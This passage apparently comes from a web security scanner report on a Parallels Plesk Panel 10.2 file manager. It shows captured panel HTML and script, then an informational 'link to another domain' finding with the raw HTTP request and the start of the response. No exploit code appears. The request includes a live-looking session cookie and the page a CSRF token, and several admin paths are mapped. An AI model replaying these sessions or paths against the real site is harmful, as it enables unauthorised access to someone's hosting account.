[&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>9 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_favicon.ico" value="favicon.ico" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=favicon.ico" onClick="return bin();;lon();">favicon.ico</a></td><td class="number">17.1&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/favicon.ico" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=favicon.ico" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ffavicon.ico" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=favicon.ico" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_header.js" value="header.js" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=header.js" onClick=";lon();" onMouseOver="f(event, &#039;webscript&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_webscript.gif" width="16" height="16" alt="file_webscript.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=header.js" onClick=";lon();">header.js</a></td><td class="number">0.87&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/header.js" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=header.js" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fheader.js" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=header.js" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_index.html" value="index.html" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=index.html" onClick=";lon();" onMouseOver="f(event, &#039;webpage&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_webpage.gif" width="16" height="16" alt="file_webpage.gif" title=""></a></td><td><A href="/spaw/spaw.php?file_name=/httpdocs/index.html" onClick=";lon();">index.html</a></td><td class="number">9.12&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=index.html" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Findex.html" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=index.html" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>9 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

8.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/rename/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&file=cgi-bin HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:31:24 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:31:24 GMT
Connection: close
Content-Length: 22337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
